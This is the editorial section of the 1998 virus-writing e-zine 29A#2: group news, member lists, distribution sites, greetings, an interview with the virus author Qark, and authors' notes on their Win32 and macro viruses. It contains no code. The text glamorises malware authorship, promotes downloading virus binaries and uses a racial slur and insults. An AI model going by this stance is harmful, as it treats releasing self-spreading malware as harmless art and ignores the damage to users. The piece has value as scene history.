Introduction to 29A#2 > Mister Sandman/29A Friday 13th,
december of 1996, at 6:66am... 29A#1 is officially released to the
public. It was undoubtly a magic date. But not as magic as friday
13th, which is a special day for viruses, of february, in 1998, at
6:66pm... this was the final release date/time of 29A#2, and the
most curious thing is, we had never thought about letting such a
coincidence happen... but it did. In this evil year (666*3=1998),
who knows what else might happen in the scene? It has passed over a
year since our first issue was released, last december in 1996.
However this does not mean, like many people say, that we "release
one issue per year". No, that's not fucking true... we've spent one
year in order to release 29A#2 but that doesn't mean we will do
that again. Lots of circumstances drove us to be late, such as:
some members doing the military service, major changes and internal
reestructuration, and most important of all: the necessity to spend
a lot of time on I+D work in order to start the way in the so
called "new school" (Win32). It's easy to notice now that, in most
of the cases, those who could not understand these reasons were
either kids with no necessity of doing the military service (by
now) or coders who are not still interested on spending their
efforts on Win32. You can find people out there claiming they
"release 3 or 4 zines per year, instead of 1", harassing you,
making pressure and/or stupid jokes about the reasons which make
your zine get delayed, and so on. But the funniest thing is they
pay so much attention to your ass, so they do not pay any at theirs
and then get grasped, and it's their zine which gets delayed
because of the same reasons they were joking about a few months
ago. Being serious now, it is important to say that making
comparisons about quantity is very easy. It is also important to
remember tho that YAM for instance, released three issues in their
eight months of life. We are not speaking about quantity, but about
quality. And also about contents plus continent, working in a
proffesional way, and offering interesting and innovating articles
and viruses to our readers. We do our best and we think it's ok,
you judge :) Like Jacky Qwerty, in a speedtalking,
hypergesticulating Tarantino-like way says, "this second issue of
29A is full of hot new ground-breaking kick-ass stuff from top to
bottom" - or that's what we think, it's up to you to tell us
whether we're right or wrong at this. However nobody can negate the
fact that we have developed for this issue completely new and
unseen stuff like, for instance, the new (definitive) Win32
techniques, not only for infection but also for residency, stealth,
error handling, etc. We're publishing here as well the hottest
disassemblies, engines, tools, tutorials and, of course viruses of
our own, including the first multiprocessor/multiplatform infector,
the first virus which executes backwards, the first boot infector
that uses PMODE features, the most spread baby in the world right
now (CAP), and lots of completely original-featured viruses, which,
together with the rest of the articles, we hope you'll read and
enjoy. We hadn't released anything for over a year until this issue
of 29A was uploaded to our FTP and eventually made publically
available, and that is something like saying that you'll find the
work of a whole year, here inside. From now onwards things will
change, and we hope we will release our future issues within
shorter periods of time. And this will probably mean that, at least
for us, "something better than 29A#2" will almost become an
oxymoron. However we will try, as it was one of our initial
intentions, to make every future issue of 29A better than the
previous one(s). About the scene there's a very important thing to
say: it's alive, and it's more active than it has ever been, in my
(humble) opinion. Besides the fact that lots of new groups have
emerged, which is something always happens, we can see many
important virus groups such as iKx, SLAM, SVL, Stealth, and so
on (so on=the ones i've unintentionally forgotten), as well as,
for instance, magazines based on external collaborations without
any group supporting them, ie Sources of Kaos. As you can see
there's a lot of competence and it is pretty obvious that there's
still a lot to do in the scene ;) And i think this is all by now...
there is a separate article, called "News since 29A#1", in which we
try to describe more or less what has happened in the scene and in
29A as part of it, since our first issue was released. Now it's
time just to wish you will enjoy this new issue of 29A, and to ask
you not to forget to read any of our articles, we hope you'll like
them. "We're pleased if you're pleased" :)
Mister Sandman, bring me a dream.
News since 29A#1 > Mister Sandman/29A In a whole year it's
obvious to say that many things happened. And it would be a real
fuck to try to sum them all up in this article, so we'll only try
to write a brief report about the most important events which took
place in all this time. In fact there's nothing too interesting
here, just some kind of curious news which may seem funny or at
least not boring to you. For us, they were great and amazing
experiences we hope we'll go thru again. First of all, after the
release of 29A#1, was the discovery of some bugs in the article
browser and some errors in a few articles. Our first e-zine was
just a test and i think it was a pretty good first step. And it
meant a big help for us in order to get some experience about
magazine releasing. There was as well kind of a "lack of fame",
what forced us to be lame in some aspects of the magazine (in the
esthetic side) such as the sucking ANSI i had to draw myself in
less than 30 minutes before releasing the zine. Many long
conversations about this and other aspects of 29A took place, while
our holidays (the VX ones) finished and we had to restart writing
viruses. It was nice however to have received tons of e-mails from
almost every part of the world congratulating us for the work we
did in 29A#1. We kept on working on our viruses/articles, and by
the same time we started thinking about the idea on developing the
so-called "29A Labs", our website located in
http://29A.islatortuga.com. Also we stopped connecting to EFnet,
and, instead, we started visiting the recently founded spanish IRC
network, where we eventually settled after having created our own
virus channel. And these changes were not only affecting the group
externally, but also internally, as by this time there were as well
a lot of new members joining, and other members becoming
collaborators. And you may be wondering now what the fuck a
collaborator is... well, this is another feature we have
implemented in 29A. Now the organization is formed both by members
and collaborators. Members are those who have the compromise to
write a certain number of articles and/or viruses per an also
certain period of time, they are 29A, the virus writing group
itself. Collaborators are external VXers who don't have any
compromise with us, who write articles or viruses when they feel
like that, and who send them to us in order to collaborate with the
group. It is important to say that many ex-members due to their
inactivity or because of their lack of time were "reclassified" and
put as collaborators, instead of members. So, that's the way the
group is formed. The official list of members and collaborators
follows, including the last-hour additions :) IMPORTANT!!! if any
of the e-mail addresses below does not work, try to use cryogen.com
instead of islatortuga.com, or vice-versa. It is also important to
note that we are probably moving in the next months to 29A.org, so
these addresses may become obsolete soon, albeit they'll still
exist, and we will keep on checking them from time to time.
-29A MEMBERS- (the VX dream-team) ;) Member name Origin IRC nick
E-mail Mister Sandman......... Spain....... MrSandman.......
[email protected] Darkman................ Denmark.....
_darkman_....... [email protected] GriYo..................
Spain....... GriYo............... [email protected] Jacky
Qwerty........... Peru........ jqwerty...........
[email protected] Rajaat................. UK..........
Rajaat....... [email protected] Reptile................
Canada...... Reptile-... reptile./[email protected]
Super.................. Spain....... Superx..........
[email protected] Tcp.................... Spain.......
Tcp................... [email protected] Vecna..................
Brazil...... Vecna............ [email protected]
Wintermute............. Spain....... Winter.....
[email protected]
-COLLABORATORSCollaborator name Origin IRC nick E-mail Anbal
Lecter.......... Spain....... _Anibal_..........................
n/a AVV.................... Spain....... avv...................
[email protected] Heuristic.............. Denmark.....
n/a............................... n/a Leugim San.............
Spain....... LeugimSan...... [email protected] Lord
Julus............. Romania..... LordJulus.....
[email protected] Mr. White.............. Spain.......
W666.......... [email protected] "Q" the Misanthrope ...
USA......... n/a...... [email protected]
Spanska................ France...... El_Gato........
[email protected] SSR.................... Russia......
ssr............................... n/a The Slug...............
Spain....... the_slug......... [email protected]
VirusBuster............ Spain....... VirusBust..........
[email protected] Ypsilon................ Spain.......
Ypsilon........... [email protected] Z0MBiE.................
Russia...... Z0MBiE............................ n/a
Now that these important news have been told, it is time to
start reporting the trivial events. I would first mention our
appearances in the media. The first one was in PC Revue (?), a
slovakian paper-printed magazine, where we could read a brief
comment about my AntiCARO virus. After this, we received via
Internet an e-mail from a guy called Javier Guerrero, who heads a
virus oriented section in a spanish paper-printed magazine called
PCmana. We had some chats about what we (29A+him) exactly wanted,
and after that short period of time, a full-color, four-page
article about the virus scene and 29A appeared in PCmana, which is
one of the most popular computer magazines in Spain. In the next
month, he dedicated another -even longer- article to the analysis
of my virus Torero, and two months ago we were mentioned in an
article dedicated to virus payloads, as before last summer we had
talked with him about the idea of writing such an article, and
provided him with some of the most known virus payloads. Besides,
we have been interviewed by many other media, and we're waiting
right now for more public appearances. These plans include our
probable presence in a TV program!, plus the already confirmed
announcement of the release of 29A#2 in PCmana, and some article(s)
in another spanish paper-printed computer magazine (the best sold i
think), called PC-Actual. But this all is a surprise we would not
like to unveal by now... just keep on visiting the 29A Labs! ;)
These are, btw, some excerpts of the article about us in
PCmana:
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- - - - ->8 On cover: "Exclusive interview to spanish virus
creators" Index : "[...] we offer to you a very interesting
interview with two members of a spanish group of virus creators,
called 29A. In an informal chat, our guests describe their methods,
their history, and their future plans, as well as their opinions
about the national and international virus scene". Page 141:
"Nowadays, 29A is, internationally, the most important virus
creating group, as well as the first and unique one from Spain".
Page 142: "Writing viruses the way we do in 29A is to code for art
and entertainment, not for effectiveness and destruction
(Mr.Sandman)". - - - - - - - - - - - - - - - - - - - - - - - - - -
- - - - - - - - - - ->8
The whole article has been converted also into a webpage, so
everybody owning a browser may check it out at the official website
of PCmana, together with other articles 29A was mentioned in:
(*)
http://www.canaldinamic.es/PCMANIA/PC057/VI/pc057vivirus0000.html
(*)
http://www.canaldinamic.es/PCMANIA/PC058/VI/pc058vivirus0000.html
(*)
http://www.canaldinamic.es/PCMANIA/PC061/VI/pc061vivirus0000.html
Other funny event took place last summer, in Madrid. We
celebrated the very first european VX meeting, albeit it was
initially supposed to be a meeting only for 29Aers. However that's
what it eventually became, as most of those VXers who were supposed
to come finally couldn't, because of several different reasons. For
instance, Rajaat planned to go by car from UK till Luxembourg,
where he'd meet CoKe and then come to Spain. A completely
unfortunate last-hour crash the same day he was leaving the UK
messed every plan and made impossible to meet them... driving while
being stoned... you know ;) The only foreigner we could meet was
Spanska, from France. After having met everybody we went to a
restaurant and had our meal. Then we went for a walk to a cybercaf
where we connected to IRC and had some fun on-line, and that is
when we decided to split for meeting later in order to go party.
Some of us went to the most famous square in Madrid, Plaza Mayor,
were we could sit in a bar and try to write a virus together, it
was a pretty funny thing albeit we couldn't finish it (too much
heat) :) Other people such as GriYo or Spanska decided to go their
way in order to have a rest, so they could have their energies on
top when going party. However, this was the last time any of us saw
Spanska, he felt asleep in his car until the next day :) We remet
at 22:00h or so in a McDonald's, and then went to some pubs and
night bars, including GriYo's... and our party stopped around 5:30h
or so, with some of us (especially GriYo and i) a little bit drunk
:) It was a great experience we'll repeat this summer, first in
Madrid and later -hopefully- in Amsterdam. But this time things
will be much more different, and besides we already know for sure
right now that b0z0, Darkman, Reptile, Rajaat, and Spanska are
coming, so we are sure it'll be impossible to stop laughing and
having fun for an only minute. And there are also some rumors, btw,
about the possibility of organizing a ganja-smoking contest so we
may know at last who the fuck is the king, god or whatever of ganja
;) And last but not least, like every year, the SIMO convention (an
enterprise based computer exposition, with stands and so on) took
place in Madrid, and 29A couldn't miss it ;) This time it was
GriYo, Wintermute, Mr. White (collaborator), and i who represented
the group. It was nice to meet personally the developers of Panda,
the most important spanish AV product. They were in every moment
very kind and proved that it is possible to have a good
relationship with "the other side". In this case, it was VX and AV
who shared a funny and friendly chat, for some minutes. We could
also visit the stands of other AV products, such as F-Prot, AVP,
TBAV, Scan, etc, but it was good enough to stop at them and have
some laughs... there were only salesmen, so it would have been a
loss of time to try to speak with them :P When they saw us laughing
at them they became completely astonished :) And this is all, more
or less... there's another event about to come, which deals with
the cellebration of the release of 29A#2, but i guess the report of
this party will be part of 29A#3, so... wait until then!
Mister Sandman, bring me a dream.
29A distro sites > Mister Sandman/29A In order to know the
most recent news in 29A, look for our latest releases, and be able
to download binaries of our viruses as soon as they're made
publically available, don't hesitate to go visit our "29A Labs",
the official website of the group, at http://29A.islatortuga.com.
Please note that we're moving soon to http://www.29A.org. However
29A.islatortuga.com will keep on working for a long time until we
complete our "migration". If what you want is to chat with us you
can always try at IRC, as we use to spend a lot of time in the
#virus channel of Hispanet, the spanish network. Connect to one of
the servers below and look for us, our nicknames are listed in the
"News since 29A#1" article:
orion.irc-hispano.org...............
pleyades.irc-hispano.org............
vega.irc-hispano.org................
fenix.irc-hispano.org...............
pegasus.irc-hispano.org.............
saturno.irc-hispano.org.............
marte.irc-hispano.org...............
mercurio.irc-hispano.org............
ganimedes.irc-hispano.org...........
pulsar.irc-hispano.org..............
gaia.irc-hispano.org................
sirius.irc-hispano.org..............
europa.irc-hispano.org..............
aire.irc-hispano.org................
titan.irc-hispano.org...............
jupiter.irc-hispano.org.............
Arrakis server Arrakis server Arrakis server Arrakis server
Milenium server ERGOS server Minorisa server Mundiva server EUI UPV
server RedesTB server Argo server Servicom server CTV server
Catalunya.Net server InforEspaa server Lleida Networks server
Since 29A#1 was released many sites (both webs and boards)
showed their interest on distributing officially 29A. If want to
join the list of 29A distribution sites, just e-mail either Darkman
or me (you can find our address in the "News since 29A#1" article)
and specify in your message: the name of your website/board and its
address/phone number. And then you'll appear in the following list,
when updated:
Web site/Board name Address/Phone 29A Labs (world
hq)............................. http://29A.islatortuga.com
Cicatrix site (usa hq)...............
http://www.cyberstation.net/~cicatrix SiZiF's site (.yu
hq)............... http://solair.eunet.yu/~sizif/29A.html Dejanu's
site (.ro hq)................. http://www.rotravel.com/dejanu/29A/
Arrested Development (euro hq)..............................
+31-773-547477 Black Adder (.il
hq)......................................... +972-651-4404
BlueDemon BBS (.mx hq)......................................
+52-461-555-19 Dark Node (.es
hq)....................................... +34-(9)86-564-053
Edison's Temple.........................................
+34-(9)1-406-03-72 FaLCoN BBS (.br
hq)........................................ +55-11-875-9838 IX BBS
(.de hq).............................................
+49-6074-68390 Satanic Brain (.ar
hq)....................................... +54-13-837480 The Frynge
(.ca hq)........................................ +1-604-763-6314
Toxic Delusions (.za hq)...................................
+27-24-852-5008 UiS (.my
hq)................................................
+60-352-107-72
Due to a data loss at least 2-3 sites couldn't be added, as it
was impossible to recontact them in order to get again their data.
We in the staff hope they're reading this and then will get in
touch again.
Mister Sandman, bring me a dream.
Our greetings > Mister Sandman/29A Greetings go this time
to... _Anibal_ 00FAh avv b0z0 CaptZero Casio Cicatrix CoKe FJP
Galar Galindo giGGler God@rky Greenline iiriv Int13h jtr kdkd-666
Kid_Chaos lLeugimSan LordJulus LovinGOD LuisM Maverick MDriller mgl
Murkry nick Omega666 Owl[FS] Pedro piCarDPoltergst "Q" qark
QuantumG rretch RAIDERS rebyc ROLF sbringer ShadSeek Shumway SiZiF
Skeeve242 Sokrates Spanska SSR StarZer0 the_slug TheWizard
trgvalkie VDaemon VirusBust : : : : : : : : : : : : : : : : : : : :
: : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : :
: : : we miss your great sense of humour on IRC ;) still
translating games into spanish for EA? :P so happy you finally got
a girlfriend :) hope the fuckin t-shirt arrives soon... yours rocks
;) why are people like you so motherfucking anal? learn and sing
Madonna's "Like A Virgin" :P keep the *best* work up, man, you
rule! your computer is now stoned (same as you, heh) you're an
incult, Daft Punk roqs ;) not drunk anymore, girlfriend... really
Galar? ;) is your height still 81cms? (greeting from Super) we all
live in a love chaaat! -> R's ruin, hehe miss you and your cool
website :( ce mai faci? esti nca viu? yodel again! :) so long no
see, dude learn cheli and win a prize ;) we all are happy you're ok
again what about your life, man??? i really miss you :(
jqwerty+you+me=latin sex machines! hope to see you this summer in
Madrid ;) still working on that cookie monster? vindecatori roq!!!
:))) i promised you'll be here... so here it is :) the OS-migration
man, hehehe ;) Universe+Orgasmatron rulez (greeting from Vecna)
forget DOS and get into the new school :P greetings are the most
important section ;) hope to see you more often on IRC wanna send
greetings to your gramma? :) hope you and your BBS are still alive
:) thinking on the anti[sm] coalition? how many RedBulls have you
drunk tonite? (Super) don't get too stoned when you come to Spain
;) expressos and capuccinos rule, heh? what must you do to convince
people? be back... (666th time somebody asks you) still interested
on Linux stuff? love that crazy dutch radio reporter ;) ---pareces
un feto de ballena, lamepollas!!! really getting a paid travel to
Acapulco? forgot what IRC stands for? :) greetings because of being
GriYo's inspiration what can i say to one of my idols? you should
come more to Hispanet ;) more gypsies working at Tabacalera? :) i
promised i'd send that to you... ;) becoming a millionaire with
your AV? ;) don't even think on speaking about exams! ;) still lost
in Madrid? :P russkaya viruskaya energya!!! ;) i'm working in a
GameBoy infector, hehe ;) aaaarrggghhh, the $#%!@ military service
use a debugger instead of cut&paste :P does this seem good
enough to you? try to spice some horse up with Avecrem :) heh,
treilea salut n limba romna :) happy being the "keeper of the
virii"? ;)
W666 ww0rker Ypsilon Z0MBiE
: : : :
what about that movie you were writing? still married as far as
i know... that's a record! you start looking serious, but keep on
coding! :P what will get infected next? txt? :)
Reptile's greetings... oYirG b0z0 Kid_Chaos
piCarDReptileScorpion retch : : : : : : : schizo! change nick! got
the shirt? :P fascist Fujimori sucks badly! mooha! ;) bwaha!
rhabarber... *** You were kicked from #virus by blah0 (banned) Hey
you gimp, is it fun to work in a dungeon?! You hermaphrodizeeen
bitch! Stupid fascist!
Rajaat besides wants to greet: Rhincewind, The Unforgiven,
Antigen, Priest, and Metabolis, hoping to recontact them in the
near future. We would like also to send special greetings to Javier
Guerrero (thanks for all, man!), Bernardo Quintero (great work
coming soon heh?), our friends at Panda Software (eat this!!! :P),
and of course, to all our buddies at #hack in Hispanet, especially:
BINARIA, DarkNail, mainboard (also his girlfriend, Icar) and
Case_Zer0 (the ones i go out with more often in Madrid), also to
PhiSk, for his loyalty and a big favor i still owe, La_Santa
(heheh, my cyberwife) and to my best friends there (or at least,
those ones i can remember right now - alphabetical order): _TaNiS_,
|AkratA|, |AmandA|, |aRuSHa|, |fit0|, Akira, BiLLsUcKs, Clarisita,
dairo, deadrose, Goku, Jany, Mia (welcome to Jack Rabbit Slim's) ;)
NecronoiD, RAGE_666, SiLbY, Sr-aSpid and VaW (not a #hack addict
tho). If you are not included here, don't think you are less
important than the above for us... sometimes we even forget
ourselves!
Thanks to... Exobit Artqvo Khroma Mentat Tcp The Slug Tuk
Spanska : : : : : : : : democoding group who programmed the intro
ANSI logo and graphics of the intro (Exobit) main writing of the
intro code (Exobit) music modules of the intro (Exobit) file
browser coding, configuration, bug fixes article reader coding, bug
fixes 29A official logo, used in intro and ANSI screensaver, based
in his Cosmos virus
Mister Sandman, bring me a dream.
Legal stuff > Mister Sandman/29A Not many changes since 29A#1
so... eat more or less the same text :P Erhhhmm... well, i really
hate to do this kind of things but it's necessary anyway so... ok,
let's suffer a bit to make my lawyers happy :) Albeit most of our
readers are supposed to have more than one virus, and to be even
able to code viruses by themselves so they ain't the typical lamers
who are looking for destructive code in order to fuck some
computers at the school they "study" in we are conscious about the
fact that exists a little and very unprobable risk to fall in the
greasy hands of one of these gimps, so we'd like to make clear that
the only reason which drives 29A to release this magazine is the
basic principle of the educational purposes. As Qark said, "if we
don't hurt the community, community won't hurt us" ;) We are not
responsible of any damage caused due to the misuse of the
information (articles/viruses) released in this issue of 29A, just
same as somebody who makes knives isn't responsible if some schizo
uses one of the knives to kill another person or to cut his dick
off, got what we mean? If so, go ahead and enjoy the magazine.
Otherwise just get the fuck out :)
Mister Sandman, bring me a dream.
Interview with Qark > Mister Sandman/29A For this second
issue of 29A, we decided to interview Qark, one of the best virus
writers ever (maybe the best?), who left VLAD and the scene about
one year ago. Albeit his lack of free time, this very good friend
of mine was eventually able to make possible to bring you now this
great oportunity to know him better. We all miss you, dude. - - - -
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
->8 29A> Ok, Qark... this is the classic first question of
almost every inter29A> view... tell me why did you choose your
nick When Metabolis and I started out with VLAD we had local scene
nicks that everyone knew, so we had to get new ones. (Obviously
meta wasn't always called meta). When I first jumped into irc for
#virus, every nick i picked was always taken, so I thought to
myself "What nick could I possibly pick that noone will ever use
?", and picked Qark - because it defies the laws of English by
dropping the 'u'. But why "Qark" out of all the "Q" words ? I don't
know.. I can't think of any other "Q" words to be honest. 29A>
When and with 'what' did you start computing? I didn't own a
computer until after I left highschool. (A few years back). My
first computer was a mighty 8088 XT with 20 Meg hard disk and EGA
monitor :) 29A> And when did you first know about a computer
virus (first experience, 29A> with which virus(es), etc)? The
first I ever heard about computer viruses was when TZ's X-Fungus
virus infected Suncorp (a local bank) on the radio. The first virus
I ever encountered in the flesh was 1575 (green caterpiller) on
someones computer. I took a copy home so that I could work out how
to make a virus of my own but it was beyond me at the time. 29A>
In what computer languages can you code? ASM, PAS, SQL, Modula-2
and some C. 29A> Describe yourself (phisically, morally...
however... even sexually if 29A> you dare) :) Umm White, Male,
average height, brown hair, blue-green-hazel (something) eyes. I'm
very conservative morally - viruses are a bit of an anomally in my
personality. 29A> Ok, now about viruses... tell me 29A> the
ones you like most which ones have you coded, and/or
Let me see.. I've written a whole heap of viruses. Father,
Mother, Sister, Brother (Incest family - Very lame) - VLAD#1
Actually mother wasn't too bad. It still stealths everything. VLAD
virus, Republic, Meningitis - VLAD#2 Pretty lame still, although my
flash bios infector was a nifty idea. Hemlock, Megastealth - VLAD#3
Both these viruses were pretty cool even if somewhat buggy.
Winsurfer, Goodtimes - VLAD#4 Winsurfer was a big breakthrough
for Quantum and I so it is one of my favourite virii. Horsa, Ph33r
- VLAD#5 I liked both of these virii. Horsa was one of the hardest
things I've ever written due to the mathematics involved so I like
it, and Ph33r is the first multi-OS (kind of) virus so I liked it
too. (Quantum wrote the memory routines for that one) Gilgamesh,
tracevir, 386 virus - VLAD#6 Pretty ordinary viruses, but my VSTE
(my file entry point tunneling engine) was a new concept so I kind
of liked it, even if it has been done better since. Padania,
goodbye - VLAD#7 Padania was good. Goodbye sucked. Quantum and I
have worked on a couple of Win95 viruses together. Win95.Punch and
one in memory of TZ.. 29A> Btw, about VLAD (unavoidable
question) :) you left the group... you 29A> said you didn't have
the time for doing other things... explain it 29A> better,
please... did you get a girlfriend? :) By "other things" I meant
"anything". rest of your life goes to hell. Spend your time
vladding and the
And I do have a lovely woman who takes up a sizeable chunk of my
time :) luckily for me she likes viruses :) 29A> What about your
personal future projects? Some more win95 viruses are on the cards.
I did the vxd routines in a couple of win95 viruses so I'm still
coding every now and then.. 29A> And more thingies about VLAD...
could you tell me something about its 29A> story (who, when, why
decided to create it, etc)? I'm pretty vague about it, but I think
it went like this: Meta read ir#2 and thought "cool, im gonna start
my own virus group and call it vlad". At this stage I didn't know
him at all. A day later he was chatting to the sysop of the local
warez board about his latest group when he was put in touch with
me. And voila thats how it started. Meta had his own shareware bbs
where he was the good-guy sysop, while in a secret area was the
vlad virus section. There we would swap code for our latest
direct-action virii :) When we got enough dross ready to produce
vlad1 I jumped on the bus and the train and went out to his place
to put it all together. We met for the first time at the train
station. Nothing much happened at his place apart from the magazine
production. The main thing I remember is it being freezing cold ..
we were working on it until the early hours of the morning.
Somewhere along the track meta met TZ and invited him to our
private vlad conference on his bbs. We'd discuss virii techniques..
Sometime later we went onto IRC and our story is well known since
then..
29A> Which is/are your favourite virus(es)? RDA.fighter is
probably my favourite, followed by starship. The new virus by
Quantum and I is really cool :) near you :) coming to a hard
disk
29A> Do you think the perfect virus exists or might be ever
coded? No.. the whole idea of a perfect virus is stupid I think.
29A> How will the 'viruses of the future' look in your opinion?
It will be a resident win95/NT infector. 29A> Ok, now let's have
a look at the 29A> is the AV you like most? AVP is pretty good.
other side... AVs and AVers. Which
Its win95 version really needs a scanning VXD though.
29A> Heh... one question is enough for those niggas ;) now
about the virus 29A> scene... give me your point of view about
it (old groups, new groups, 29A> who's cool, who sucks... you
know) :) Firstly, VLAD is cool :) Nuke, rabid and yam were all
lame.. but trident and p/s were good. IR were always my favourite
group but I don't like IRG much.. 29A are way cool :) 29A>
Finally, just send a greet to someone, say something, sing, write a
29A> poem , pull yourself :)... dunno, whatever you want. This
is your 29A> free space :) RIP TZ :( Greets fly out to Metabolis
and Quantumg and all the people I like. Also a kiss to a certain
girl :) - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- - - - - - ->8 Good luck, Qark... especially with that girl
;)
Mister Sandman, bring me a dream.
Words from Jacky Qwerty > Jacky Qwerty/29A First of all, i
would like to send some short comentz and general greetz to the
good and bad virus scene. Yes, i think there exists such diference
and thats something that should be "pointed" out. Apart from this
i'll take the chance to describe my articlez, virusez and utilitiez
included in this 29A issue as well as my true purpose on writin and
spreadin out this knowledge.
The two sidez of virus scene Yes, in my humble opinion, i think
there is a "good" virus scene, one which is continuosly lookin for
new infection ideaz, new platformz and new file formatz to infect.
Just for the simple chalenge it poses by itself, not for that
stupid nonsense apetite for destruction. Thats childish rubish and
we dont like that. We rather enjoy foolin F-Potatoe's last
protection or TBAV heuristicz or discoverin Microsoft's untold
secretz, etc. This is what we like. This is the good virus scene
and we'll stay this way for a long time. The other side is the
"bad" virus scene, which is made of vandalz who have childish
programin habitz. They move and act by the simple "minimum effort"
principle. They rather enjoy randomly writin or formatin a hard
drive, than squeezin both skull and brainz out in an atempt to code
some more creative and interestin stuff, not the awful boresome
shit they're acustomed to. For the former purpose, i'd strongly
recomend to download the AVP enciclopedia DOS edition, and take a
look at all the "kick ass" virus demoz it containz. Needless to
say, I, as a VXer and member of the 29A group team, have nothin to
do with this "bad" side of the virus scene and be sure i will
reject any chance to become a "vandal" for dayz to come. Did u
stick that Bontchy! #8P
Greetz to all VXerz Warm greetz to all those creative VX coderz
around the world who use their brainz and imagination writin fancy
creative payloadz - harmless graphicz, soundz, etc - inside their
lil' creepy binary creaturez, you all rock! ;) No greetz at all to
the increasin number of lamerz and wannabeez who feel they are the
bad guyz and best coderz on earth just by writin destructive
nonsense rubish and wipin out compz at skool or friendz, you all
suck! :( As bein part of the first group, i really hope you enjoy
this 29A#2 isue as it is full of hot new ground-breakin kick-ass
stuff from top to bottom ;)
Quick description For my part i have writen and coded some nifty
Win32 (WinNT/Win95/Win32s) virusez: (1) Win32.Jacky, the very first
Win32 infector. (2) Win32.Cabanas, the very first resident,
stealth, antidebuged, antiheuristic Win32 virus. (3) DogPaw, a
simple but powerful DOS virus, which is able to infect DOS, Win3.1,
Win95, WinNT and OS/2 aplicationz via a recently discovered
backdoor, thanx Casio. (4) WM.CAP, my first and only macro virus
writen as an entrance to the macro stuff world, simple in structure
(who said complex?), but very powerful and infectious by nature -
heck i didnt know it would become so comon, blame Microsoft for
their stupidity -. This is all with respect to my virusez. I have
also prepared a couple of articlez about macro stuff, they are
named (1) Macro virus tricks, and (2) WordMacro.CAP virus
description. The first
article deals with two known limitationz with actual macro
virusez and then proposes solutionz for them. The second article
gives a full description of a real macro virus and serves as a good
compliment for the first article. Finally, i have writen two
especially useful utilitiez for Win32 (with C source code
included): (1) GETPROC, a Win32 console aplication very useful for
beginerz, which also serves as a compliment for the PE infection
tutorial. And (2) PEWRSEC, a simple DOS program which will be very
useful for you Win32 ASM coderz once you understand the benefitz of
a R/W code section on a PE file: you will be able to include the
first generation sample of your Win32 virus in the code section, as
you usually did in DOS, and you will also be able to debug it with
symbolic information included along with the source code. And last
but not least, i have prepared myself some useful INC filez for DOS
and Win32: (1) USEFUL.inc, (2) MZ.inc, (3) WIN32API.inc and (4)
PE.inc. This include filez will make more sense once u have delved
yerself into the Win32 world.
Scope and Purpose All of these virusez/articlez/utilitiez were
all coded with just one goal in mind: to make sure all this
information will be given to "otherz" before i leave the scene or
the world at worst. I mean, dont let your own knowledge be buried
along with your body, spread it out before you leave this world. If
you're smart enough and really understand this, then you are almost
ready to learn from otherz. Next is that you should be moved or
pushed to "learn" just by the simple educational purpose or the
chalenge it poses by itself. Then you'll be ready to teach your
knowledge and otherz will learn from you. Needless to say, i
wouldnt like at all to know that one of my virusez has escaped from
this zine coz you didnt understand this. Please dont be a lamer.
Now, Enjoy! (c) 1997 Jacky Qwerty/29A.
What is happening in IR/G? > Rajaat / 29A Now talking Rajaat
[IR/G]...
Preface It has now been half a year ago when our magazine got
out, and since then you haven't heard much from us anymore... Why?
I hope to cover some of the things that happened in IR/G and what
the current status is (as far as I know, that is).
Sepultura's departure Shortly after the release of IR#8
Sepultura, our main organizer and backbone of IR/G decided to leave
the scene altogether. I do miss his programming skills that I don't
have. Although I don't blame him, his departure was in my eyes the
beginning of the end of IR/G as I know it. I hereby want to thank
him for all the things he has done for me and for IR/G.
No backbone With the departure of Sepultura we also lost our
talent to organise. Without this backbone, we weren't able to bring
out any magazine after IR#8. We tried to find another person in our
group with the ability and will to organise, yet we couldn't
find/trick someone into taking that task upon him. Without any
organisation, a group cannot be in my view.
Hate to code Not being motivated very much, I found myself
unable to program very much. My time being consumed by college I
had a little time to research virus-related issues. All I could do
is think of nice tricks, program them and comment them a bit, but I
could not find the heart to make a total virus for it. This left me
with a huge pack of tricks, which I haven't used in viruses yet.
Eventually I hope I can find the motivation and time to put all
these tricks together in one big virus, which will probably be my
last virus I will make. This is not caused by a lack of interest,
and of course I will stay in the scene trying to think of new
tricks and innovate ideas.
Prologue Due to the circumstances and the overall quality of the
viruses produced by IR/G I think it suits me and them best that I
leave the group and continue the path of virus writing on myself,
contributing things to various groups. I hope that the other people
in IR/G won't be mad about my decision to leave them. I wish them
all the best, and hereby my promise that this is not the last time
they will hear from me.
Thanks Given the opportunity here I would like to thank quite a
few people who have supported me in the past and hopefully will
stay to do so in the future. The Unforgiven, for his many email
conversations, excellent ideas on human nature and beliefs, and,
most importantly his friendship during the time. I hope I will be
able to meet you sometime. Rogue, for showing his excellent
code examples, although I've never witnessed any program of him
finished in the wild, save for one. Most probably a badass to other
but a friend to me. Mister Sandman, to whom I gave this article in
order to publish it in their second magazine (they beat us *grin*).
Sepultura, for his organising skills and trying to keep the whole
lot together. I could thank a lot more people, but I think that I
must keep it short, because nobody is interested in it save for the
people who are actually thanked.
And now talking Rajaat / 29A...
Last update It sure looks like that when I write some article,
it always seems to get outdated when magazines don't get released
as quickly as anticipated (sorry folks, couldn't resist joking
about it). But since the time I wrote the upper a few things
happened. You probably have read now somewhere in this magazine
that I've become a member of 29A! My hate to code went away but
that doesn't mean I've plenty of times to code, but I'll do my best
and see what I can have in store for you.
What the hell am I up to? To be honest, I don't know. I have
here about 5 unfinished programming projects I should finish soon,
and I hope I will have the time at my disposal for finishing them.
Anyway, I'm proud to be a 29Aer and I hope I can keep up the
group's high standard of virus coding.
And how about Immortal Riot? I wish I knew, I think the best
thing my friend The Unforgiven and his comrades can do is split
from Genesis again (in my eyes it's history) and go on their own
again, should they feel like coding again. I hope that you, the
reader, will once again witness the excellent magazines of our
"hjltar i snn" (heroes in the snow).
Rajaat / 29A
Envy makes dorks resuscitate > Mister Sandman/29A It has
passed one year or so since IRG#8 (actually IRG#1, but many people
seem to think with their ass) was released. And happily that's the
last time we had the chance to hear about a pampered child whose
protagonism and egocentrism desire reached its real highlight. You
know who he is. He retired because he "did not have enough time to
keep on leading IRG", as school sucked most of his free time.
Well... for a long time we were almost forced to swallow his
childish attitude, his deic-wannabe behavior, and his lots of
attempts to suck the whole attention everytime, everywhere (haven't
you ever hated to read his stupid introductions to somebody else's
articles published in IRG#8?). And we had to read BULLSHIT like
